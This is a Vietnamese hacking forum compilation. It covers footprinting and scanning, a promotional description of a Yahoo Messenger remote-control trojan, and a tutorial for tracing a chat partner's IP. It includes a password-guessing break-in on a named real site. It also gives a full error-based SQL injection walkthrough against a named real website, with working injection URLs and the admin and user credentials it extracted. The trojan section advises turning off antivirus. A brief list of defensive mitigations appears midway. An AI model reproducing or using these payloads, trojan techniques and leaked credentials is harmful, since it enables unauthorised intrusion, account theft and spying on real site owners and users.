Bước này tương đối đơn giản. Tuy nhiên đối với hacker thật sự muốn tìm cách thâm nhập vào 1 hệ thống thì bước này rất cần thiết. Càng thu thập được nhiều thông tin liên quan đến mục tiêu càng tốt. Ví dụ như muốn thâm nhập trang web của 1 công ty nào đó, điều đầu tiên các hacker thường dùng là xác định host, domain (nếu là website); dùng các công cụ như WhoIS, Ping, ICMP (nMap, Fping)..để tìm hiểu các thông tin liên quan đến host/domain như vị trí, các Domain Name Records..Ví dụ từ domain name, ta có thể ping để biết được nó host ở đâu với IP cụ thể là gì...; hoặc tìm hiểu cấu trúc mạng của đối phương sử dụng các phương pháp routing (traceroute) và SNMP data.

Kế đến là dạo quanh web site, tìm hiểu cấu trúc website, tìm cách download source code (bằng các trình như Teleport Pro, Intellitamper..), vì từ đó có thể biết được các thông tin mà người chủ cố tình hoặc vô tình để hở như tên liên lạc, emails, số điện thoại, các thông tin liên quan đến bảo mật (như cơ chế an toàn, ngôn ngữ lập trình..); các liên kết liên quan đến website...

Việc dạo và xem cấu trúc website đôi khi sẽ cho ta cái nhìn tổng quan về bảo mật của site đó, nếu may mắn ta có thể tìm được lỗi (thường là lỗi lập trình, lỗi thiết lập access right/chmod chưa đúng..) trên các webpage, liên kết.

Các search engine như Google, AltaVista...cũng có thể trở thành công cụ rất hữu ích trong quá trình này. Ví dụ search trên Google để tìm các trang dùng asp, có trang quản lý của admin và giới hạn ở các site ViệtNam, ta có thể search theo từ khóa: "/admin/ asp site:.com.vn" hoặc "admin.asp login.asp site:.com.vn" ..Ví dụ search trên AltaVista để tìm các link liên quan đến site www.hcm.fpt.vn, ta có thể dùng từ khóa "link:www.hcm.fpt.vn AND anydata"

Đây là một ví dụ điển hình về kết quả đạt đựơc khi tìm hiểu về website: <http://www.yes.com.vn>

Lần dạo đầu tiên qua site này điều đầu tiên nhận thấy là họ dùng ASP để thiết kế. Tuy nhiên tôi chưa vội quan tâm đến việc tìm lỗi liên quan đến nó mà chú ý đến mục Hội viên và Đăng nhập hội viên, đây là vùng riêng của các member tham gia webiste. Cụ thể là tại <http://203.162.1.201/hoivien/index.asp?Lang=4> , điều tôi hay làm là thử download cấu trúc website dùng Intellitamper. Kết quả sau khi download của IT là rất nhiều file asp, ở đây tôi quan tâm đến thư mục /hoivien/ vì trang đăng nhập nằm ở thư mục này. Trong thư mục này kết quả cho thấy có 6 file asp, trong đó có file hvshow.asp làm tôi quan tâm. Tôi chạy thử nó trên browser <http://203.162.1.201/hoivien/hvshow.asp> , kết quả cho thấy bên cạnh thông báo đăng kí là thông tin của hội viên thứ 1 với login name là yesco, tên là DuongMinh và 1 số thông tin khác. Nghĩ đến việc đoán password, tôi quay trở lại trang login lúc nãy và thử đăng nhập vào với login name là yesco, pass là duongminh. Không thành công! pass là duong Cũng fail! pass là minh! Thành công! Bạn là Hội viên Vàng...Sau đó tôi xem qua 1 chút và cẩn thận logout. Ví dụ này tôi đưa ra với mục đích giúp các bạn hiểu 1 trong các bước cơ bản đầu tiên trong quá trình hacking. Hy vọng các bạn khi thử thành công không nên làm ảnh hưởng đến dữ liệu của người khác.

b. Thu thập thông tin về mục tiêu - Scanning, Enumeration

Bước này thật ra tương tự bước đầu tiên (Footprinting) nhưng ở mức độ chi tiết và nâng cao hơn.

- Tìm hiểu các dịch vụ (services) được dùng trên hệ thống đối phương, dò/quét các cổng (port) để tìm kiếm cổng hở, xác định dịch vụ dùng cho cổng này.

Một số công cụ thừơng được dùng như:

Nmap (www.insecure.org/nmap)

Netcat

Strobe (packetstorm.security.com)

ISS (www.iss.net)

Các trình duyệt cổng hở và các tài nguyên chia xẻ (share) khác dùng cho Windows như Superscan, Sechole, Redbutton, Net Essential...

Quá trình duyệt cổng có thể cho ta biết được các dịch vụ web nào được sử dụng ở mục tiêu. Ví dụ như các cổng TCP: 139, 135 (NETBIOS), 110 (pop3), 80 (HTTP), 79 (Finger), 53 (domain), 25 (smtp), 21 (ftp)...Thậm chí cả hệ điều hành và webserver đựơc sử dụng ở mục tiêu.

Ví dụ với netcat, ta dùng lệnh sau: nc -v -z 203.162.1.1 1-255

Với nmap, ta dùng: nmap -sS 203.162.1.1/255 hay nmap -p80 -O 203.162.1.10

Các bạn tự tìm hiểu cách sử dụng các tool khác. Lưu ý các câu lệnh ví dụ ở đây chỉ mang tính chất tham khảo.

- Tìm hiểu các lỗi/lổ hổng bảo mật mà mục tiêu có thể mắc phải. Ta có thể tìm thông tin từ các website sau:

www.securityfocus.com

www.l0pht.com

www.microsoft.com/security

packetstorm.security.com

...

Hoặc có thể đăng kí ở các mailing list để có thể nhận được các thông tin về security cập nhập nhất:

Buqtraq (www.securityfocus.com)

NTBugTraq (www.ntbugtraq.com)

Pen-Test (www.securityfocus.com)

...

c. Tiến hành tấn công

- Khai thác điểm yếu của hệ thống, hệ điều hành

. Thử tìm cách truy xuất đến các dịch vụ của hệ thống dựa trên hoặc có liên quan đến các lỗi bảo mật

. Tìm hiểu các thông tin về lỗi bảo mật từ các nhà sản xuất hệ thống, tìm hiểu các thông tin patch/update tương ứng với version bạn đang nghiên cứu

- Khai thác điểm yếu của các ứng dụng dùng trên máy chủ - server

. Một số ứng dụng server có thể có lỗi như Microsoft IIS, Netscape Enterprise Server, Oracle, Apache...

- Khai thác điểm yếu của các ứng dụng client

. Tìm hiểu các lỗi về /cgi-bin, các lỗi về tràn bộ đệm

. Tìm hiểu các lỗi về javascript

. Tìm hiểu các lỗi về cookies

. Tìm hiểu các thiết lập mặc định của các ứng dụng web, vd như mật khẩu admin ngầm định của một số forum...

- Leo thang đặc quyền (Escalate Privileges), tôi chỉ mô tả một số cách có thể đạt được mục đích

. Theo dõi trên mạng (sniff) để tìm cách lấy các thông tin bảo mật của người dùng, vd như dùng các công cụ bắt gói tin (packet sniffer) để bắt các thông tin liên quan đến mật khẩu di chuyển trên mạng...

. Tìm cách lấy các SUID từ các chương trình quản lý nhưng khả năng kiểm tra các giá trị nhập vào hoặc các giá trị biên kém.

. Tìm hiểu các user (user ID) ko có mật khẩu, mật khẩu rỗng, hoặc các mật khẩu ngầm định

. Tìm kiếm các thông tin về mật khẩu trong các file trên hệ thống, dùng các công cụ crack pass nếu các file password đựơc mã hoá

. Tìm hiểu kĩ mối quan hệ giữa các máy trong hệ thống muốn thâm nhập, dò các sơ hở và tìm cách khai thác lan rộng ra khắp hệ thống.

Như vậy, leo thang đặc quyền là tìm cách nâng cao quyền hạn của mình trong hệ thống. Vi dụ từ user Guest hay Normal user trong hệ thống, hacker có thể tìm hiểu các sơ hở để từ đó bổ sung thêm quyền hạn cho mình, thậm chí đoạt quyền admin. Một ví dụ điển hình của leo thang đặc quyền trong quá trình khai thác lỗi của Hosting Controller, khi upload 1 exploit script lên 1 normal host, nếu sau đó ta tìm cách chuyển script đó vào thư mục admin của HC thì khi run nó sẽ có quyền admin.

- Mở rộng khai thác ra các hệ thống lân cận; xác định các mục tiêu kế tiếp bắt nguồn hoặc có liên quan đến mục tiêu ban đầu

. Dùng netstat -na để tìm hiểu các connection đến các máy khác

. Thử khả năng từ một máy trong mạng, kết nối đến máy khác có trust-relationship, nếu may mắn thì có thể thâm nhập được mà ko phải qua các quá trình kiểm tra gắt gao

. Tìm hiểu các file có trên hệ thống, chẳng hạn như các file trong *nix /etc/hosts, ssh/identity.pub ...

- Các bước khác tùy khả năng của bạn.

d. Xóa dấu vết (xóa log files..), tệ hơn có thể là phá hủy thông tin của hệ thống

3- Các mục tiêu và phương pháp hay dùng hiện nay

a. Các mục tiêu thuờng bị tấn công

- Unix và các biến thể từ nó: Linux, FreeBSD, Solaris, SCO..

- Các hệ thống Windows NT, 2k, XP, 9x...

- Các dịch vụ và máy chủ WWW

- Các ứng dụng web, forum...

- Trộm mật khẩu của các dịch vụ web như các web e-mail, instant messenger...

b. Các kiểu tấn công thông dụng

- Tấn công làm ngập đường truyền mạng (flood), tấn công từ chối dịch vụ (Distributed Denial of Service)

- Tấn công dạng local - cục bộ

- Tấn công remote - từ xa

- Tấn công dạng điều khiển dữ liệu - data driven

Bây giờ tôi sẽ phân tích chi tiết hơn về các kiểu tấn công ở trên.

b.1 Tấn công từ chối dịch vụ (DoS)

- Feature driven

SYN flooding

- Inappropriate configurations

SMURF

- Programming flaws

Teardrop

- Distributed DoS: DoS tập thể 1 mục tiêu từ nhiều hướng, nhiều máy

....(Sẽ biên soạn và bổ sung sau)

b.2 Tấn công dạng local - host based

- Khai thác các lỗi tràn bộ đệm

Cách hạn chế: Quản lý tốt bộ nhớ, stack; cập nhật các bản sửa lỗi; lập trình kĩ càng và tốt hơn.

- Khai thác các điểm yếu trong việc kiểm tra điều kiện thực thi của các ứng dụng

Cách hạn chế: Lập trình kĩ và tốt hơn

- Dùng trojan, backdoor, virus...

Cách hạn chế: Kiểm tra kĩ càng các chương trình lạ trứơc khi thực hiện, sử dụng các trình diệt virus thông dụng và thường xuyên cập nhật

- Crack password

Cách hạn chế: Dùng các kĩ thuật mã hóa cao hơn, hạn chế số lần thử mật khẩu ở các login form

- Đăng nhập vào hệ thống kiểu vật lý bằng cách khởi động từ đĩa mềm hoặc một hệ điều hành song song khác

Cách hạn chế: Tăng cường các biện pháp bảo vệ các thiết bị

b.3 Tấn công dạng remote - network based

- Khai thác các lỗi tràn bộ đệm

Cách hạn chế: Tương tự như ở local

- Tấn công nhiễm độc tên miền (DNS Cache poisoning)

Cách hạn chế: Dùng cache timeout, DNSSEC, Non-Caching Servers

- Tấn công vào lỗi/lổ hổng của website.

Cách hạn chế: Cập nhật các bản sửa lỗi mới nhất, thiết lập cấu hình chính xác, điều chỉnh các quyền hạn, thiết kế và viết mã website tốt.

- Khai thác các tên đăng nhập, mật khẩu yếu; tức là các mật khẩu ngầm định, quá ngắn, dễ đoán; hoặc các dạng đăng nhập có cơ chế kiểm tra sơ hở, ko kiểm tra số lần thử password...làm dễ crack bằng dictionary, bruteforce...

Cách hạn chế: Tăng cường kiểm tra số lần thử password (vd sẽ ko cho tiếp tục đăng nhập nếu số lần nhập sai password quá 5 lần..), giới hạn chiều dài password tối thiểu, tăng cường mã hóa bằng các giải thuật tốt...

- Khai thác từ các thông tin chia sẻ (sharing) như SMB/NetBIOS, NFS

Cách hạn chế: giới giạn quyền hoặc tắt share, nâng cấp hệ thống file có khả năng bảo mật cao hơn như NTFS, HPFS...

b.4 Tấn công dạng điều khiển dữ liệu - data driven

- Khai thác sơ hở của các đối tượng dữ liệu dùng phía server, các mã Java, Javascript, VBScript, Perl, PHP..., các ActiveX control.

- Dùng cửa sau (backdoor), trojan, virus

Vài thông tin về các backdoor:

Unix:

sshd

Windows: BackOffice 2k, DeepThroat (cổng UDP 2140, 3150), NetSphere (TCP 30100, 30102), GateCrasher (TCP 6969), GirlFriend (TCP 21554), Hack'a'Tack (TCP 31785; UDP 31789, 31791), EvilFTP (TCP 23456), SubSeven (TCP 1234)

- Khai thác sơ hở từ các cổng dịch vụ, các giao thức cấu hình sai hoặc có cơ chế bảo mật yếu.

Cách hạn chế chung dạng này: Cập nhật các bản sửa lỗi, fix lỗi; thiết lập cấu hình chính xác; dùng tường lửa (firewall, proxy), các trình antivirus.

II. PHÍA NHỮNG NHÀ QUẢN TRỊ HỆ THỐNG

Chúng ta sẽ đề cập đến một số phương pháp có thể giúp ích cho những nhà quản trị trong việc hạn chế và ngăn chặn sự tấn công của hacker

1- Thiết kế tốt hệ thống - Design

Một trong những nguyên nhân chủ yếu giúp hacker thành công trong việc hack vào các hệ thống là do bản thân sự yếu kém trong việc thiết kế hệ thống của những nhà quản trị. Một hệ thống được gọi là tốt phải là một sự phối hợp đồng nhất và hiệu quả của các thiết bị phần cứng (đường truyền mạng, router, server...) và phần mềm (OS, software...). Phần cứng phải được lựa chọn phù hợp; bố trí, cài đặt hợp lý và được bảo vệ cẩn thận. Phần mềm cài đặt và thiết cấu hình chính xác, cập nhật thường xuyên các bản sửa lỗi. Một điều quan trọng là chúng phải đựơc quản lý bởi người có kiến thức và kinh nghiệm.

Một số vấn đề ta cần quan tâm ở đây:

- Tường lửa

- Phân chia, bố trị mạng

- Kiểm tra thường xuyên các nỗ lực thâm nhập

...

2- Kiểm tra kĩ lưỡng hệ thống - Quality Assurance

...

3- Theo dõi các hành vi tấn công - Intrusion Detection

...

4- Các chính sách bảo mật và kết luận chung - Security Policies

...

III. NHỮNG CÔNG CỤ HỮU ÍCH

...

Authors:

W_Hat (collecting, translating and updating)

Zorro (documenting)

Versions:

1.01 Draft version 07/25/2002 by W_Hat

References:

Hacking Exposed series

SystemExperts

Internet

MSDN

Cuồng Long

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 9)

Xâm nhập máy tính từ xa thông qua Yahoo! Messenger

Sơ lược chương trình

Đây là một chương trình xâm nhập và kiểm soát máy tính từ xa thông qua Yahoo! Messenger. Với công cụ này, bạn có thể kiểm soát bất cứ một máy tính nào bằng cách gửi thông tin qua Yahoo! Messenger ảo thiết lập trong hệ thống. Từ đó bạn có thể ra lệnh cho máy đối tượng làm theo bất kỳ mệnh lệnh nào.

Cơ chế hoạt động:

Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:

1) Chạy vào chương trình khởi động (Startup).

2) Kiểm soát bộ nhớ hệ thống.

3) Nằm ẩn chờ khi có kết nối vào mạng.

4) Khi máy đối tượng đã kết nối, phát tín hiệu trở về cho máy ID ảo.

5) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công.

6) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân.

Cấu hình tối thiểu:

1) Hệ điều hành Microsoft Windows XP hoặc Windows Server 2003 . Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux.

2) 128MB RAM (256MB RAM cấu hình chuẩn)

3) 700Mhz CPU.

4) 8MB Card đồ họa.

5) Dung lượng trống đủ dùng. (Để lưu hình chụp gửi về)

6) Kết nối mạng thường xuyên. Chương trình hoạt động với mọi loại mạng. Ví dụ: Dialup, ADSL, Wireless, Broadband, Satellite, LAN...

Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường. Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt hơn.

Tính năng đặc biệt

Không đòi hỏi IP Address! Đây là ưu thế mạnh nhất của chương trình này. Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát. Với chương trình này thì không đòi hỏi IP Address.

Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address?

Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển. Mặc dù IP Address vẫn được gửi cho bạn khi kết nối. Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger.

Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ. Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh. Trước đây, bạn phải có được IP Address hợp lệ. Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác. Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống. Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống. Nhưng giờ đây, vấn đề đã được giải quyết với TroMessenger.

Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Các kiểu lệnh

Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v ... đều có thể được sử dụng như lệnh DOS.

Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS

Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server ... v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính

Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername - cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername - cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.

Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.

Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?

Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.

Câu lệnh: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"

Chú ý: Bạn phải sử dụng dấu ngoặc ("). Nếu quên, quá trình tải về sẽ không thực hiện được.

/restart - Khởi động lại máy tính.

Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn ... ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.

Câu lệnh ví dụ :

/status Toiyeuem.

/idle Dangantoi.

/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu...

Nhưng chú ý: Đây là chương trình xâm nhập trái phép và có thể có Trojan nên khi bạn giải nén ra một số file sẽ bị Symantec và NAV kill luôn. Bạn nào muốn edit thì tắt auto protect của NAV đi (nhưng coi chừng gậy lưng đập lưng ông đó)

moonlight123 - HVA Online

Email: [email protected]

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 10)

Bài viết này do bạn Neo viết ra, nhằm giúp đỡ các bạn không biết gì về Hack có thể Hack được một trang Web khi phát hiện bị lỗi SQL Injection và có sử dụng OLE DB đồng thời cũng để khích lệ các thành viên và điều hành viên tích cực Post bài và săn Bug nhiều hơn nữa trong forumj của bạn ấy. Vì thấy đây là 1 bài viết khá bổ ích nên muội đã sưu tầm lại cho các huynh tìm hiểu.

======================

Ở đây tôi xin giới thiệu cách Hack vào Website http://www.equipmentworldindia.com vì Website này không có nhiều thông tin quan trọng nên mức ảnh hưởng khi đưa ra cho các bạn thực hành sẽ không cao.

Bây giờ ta bắt đâu công việc

bug : http://www.equipmentworldindia.comsh...asppid= 1'/

Kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Unclosed quotation mark before the character string ''.

shopViewProduct.asp, line 115

1. Thu thập cấu trúc dữ liệu

Ta bắt đầu lấy cấu trúc dữ liệu của Website này.

Lấy Table đầu tiên trong CSDL của Website

httpwww.equipmentworldindia.comshopViewProduct.asp PID=1%20and%201=convert(int,(select%20top%201%20ta ble_name%20from%20information_schema.tables))##sp_ password

Cho ta kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the nvarchar value 'EWIAlsoArticle' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta có table đầu tiên 'EWIAlsoArticle'

Lấy tiếp table thứ hai

httpwww.equipmentworldindia.comshopViewProduct.asp PID=1%20and%201=convert(int,(select%20top%201%20ta ble_name%20from%20information_schema.tables%20wher e%20table_name%20not%20in%20('EWIAlsoArticle')))## sp_password

Kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the nvarchar value 'dtproperties' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy table thứ hai là 'dtproperties'

Lấy tiếp table thứ ba

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20table_ name%20from%20information_schema.tables%20where%20 table_name%20not%20in%20('ewialsoarticle','dtprope rties')))/##sp_password

Kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the nvarchar value 'ewi_Admin_User' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta có table thứ 3 là 'ewi_Admin_User' một Table quan trọng.

Nếu muốn các bạn có thể tiếp tục lấy thêm các table khác, để lấy được đúng table mà bạn cần.

Làm tương tự cho các table tiếp theo, các bạn có thể lấy được table EWIUsers là Table chứa thông tin về thành viên đăng ký trong Website này.

2. Lấy User và Pass Admin

Biết Table Admin là ta phải thu thập nốt các Column trong Table đó.

Lấy Column đầu tiên

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20column _name%20from%20information_schema.columns%20where% 20table_name=('ewi_admin_user')))/##sp_password

Kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the nvarchar value 'Userid' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta có Column đầu tiên là 'Userid'

Sau đó lấy tiếp column tiếp theo bằng where column_name not in bằng URL sau

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20column _name%20from%20information_schema.columns%20where% 20table_name=('ewi_admin_user')%20and%20column_nam e%20not%20in%20('userid')))/##sp_password

Kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the nvarchar value 'Password' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta lấy được column thứ hai là Password.

Bây giờ thì ta lấy Pass Admin được dễ dàng.

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20userid %2b''%2bpassword%20from%20ewi_admin_user))/##sp_password

Kết quả là

Error Type

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the varchar value 'ewistarplus' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy UserPass của Admin là ewistarplus

Đăng nhập thử

http://www.equipmentworldindia.com

Đăng nhập thành công. Bạn đã là Admin của Site này.

Và từ đó có thể quản lý người dùng dễ dàng. Tuy nhiên phần dưới đây tôi vẫn trình bày cách lấy User và Pass của người dùng nhằm mục đích phần này để các bạn tự làm theo giống như đã là với lấy Pass Admin. Nếu ko làm được các bạn có thể xem Guide tiếp.

3. Lấy thông tin người dùng

Table chứa User và Pass của người sử dụng trong site này là 'EWIUsers'. Các bạn thu thập các column của table này và có danh sách các column như sau

'User_Id','Loginname','Password','UserType','Creat iondate'

(Thông qua URL http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20column _name%20from%20information_schema.columns%20where% 20table_name=('ewiusers')%20and%20column_name%20no t%20in%20('user_id','loginname','password','userty pe','creationdate')))/##sp_password)

Lấy User và Password của người dùng đầu tiên

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20loginn ame%2b''%2bpassword%20from%20ewiusers))/##sp_password

Kết quả

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the varchar value 'advanced1advanced1' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy UserPass của người dùng đầu tiên là advanced1advanced1

Đăng nhập thử http://www.equipmentworldindia.com

Nhập User và Pass vào Form Login phía tay trái, đăng nhập thành công. Done !

Bạn có thể lấy User và Pass của người dùng tiếp theo bằng where User_id not in

Ví dụ lấy UserPass của người thứ hai

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20loginn ame%2b''%2bpassword%20from%20ewiusers%20where%20us er_id%20not%20in%20('1')))/##sp_password

Kết quả

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the varchar value 'agilent1agilent1' to a column of data type int.

shopViewProduct.asp, line 115

Như vậy User và Pass của người thứ hai là agilent1agilent1

Đến đây tôi xin kết thúc bài viết của mình. Phần còn lại các bạn có thể tự làm nốt hoặc nghiên cứu gì đó cao siêu hơn.

Chúc các bạn Hack vui vẻ và đừng Drop DB của người ta nhé )

( Tác giả Neo )

( Admin vnISS+)

Hướng dẫn lấy IP của victim khi chát

Bài viết từ cd hacker mình share cùng các bạn

Rất mong sự góp ý của các bạn

Bạn phải chat với Victim dể có sự thiết lập IP. Nói chung là giữ Online Connect với Victim.

Mở một cửa sổ DOS prompt

Vào C:gõ lệnh sau: netstat -a

C:\b netstat -a

Lúc dó trên màn hình sẽ xuất hiện 1 số thông tin có dạng nhu sau:

Active Connections

Proto Local Address Foreign Address State

TCP franck-a:0 0.0.0.0:0 LiSTENiNG

TCP franck-a:1091 0.0.0.0:0 LiSTENiNG

TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAiT

TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED

Chúng ta chỉ chú ý những dòng nào có chữ ESTABLiSHED, dó là thông báo cho sự nối kết dã duợc thiết lập với bên ngoài.

Nếu chúng ta chat với nhiều nguời, chat bằng cả Yahoo Messenger nữa thì sẽ có nhiều ESTABLiSHED, do vậy chúng cần chú ý và phân biệt xem ai mới thực sự là Victim của mình.

Với ví dụ trên ta thấy p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED là dáng chú ý và quan tâm cả. Còn nếu test trên máy bạn thì nó sẽ khác di nhung ta chỉ cần quan tâm dến dòng tuong tự nhu vậy và có ESTABLiSHED là duợc

Việc tiếp theo của chúng ta là Ping Victim này dể lấy duợc IP thật của họ.

Cung ở của sổ DOS prompt này, ta gõ lệnh Ping p3-max35.auck.ihug.co.nz

:1054 ESTABLiSHED ==è chúng ta không quan tâm cái này nên không cần thêm vào sau lệnh Ping

c:p3-max35.auck.ihug.co.nz

Wow, thật là tuyệt, tới dây ta dã thấy duợc IP thật của Victim rồi.

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:

Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39

Request timed out.

Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39

Request timed out.

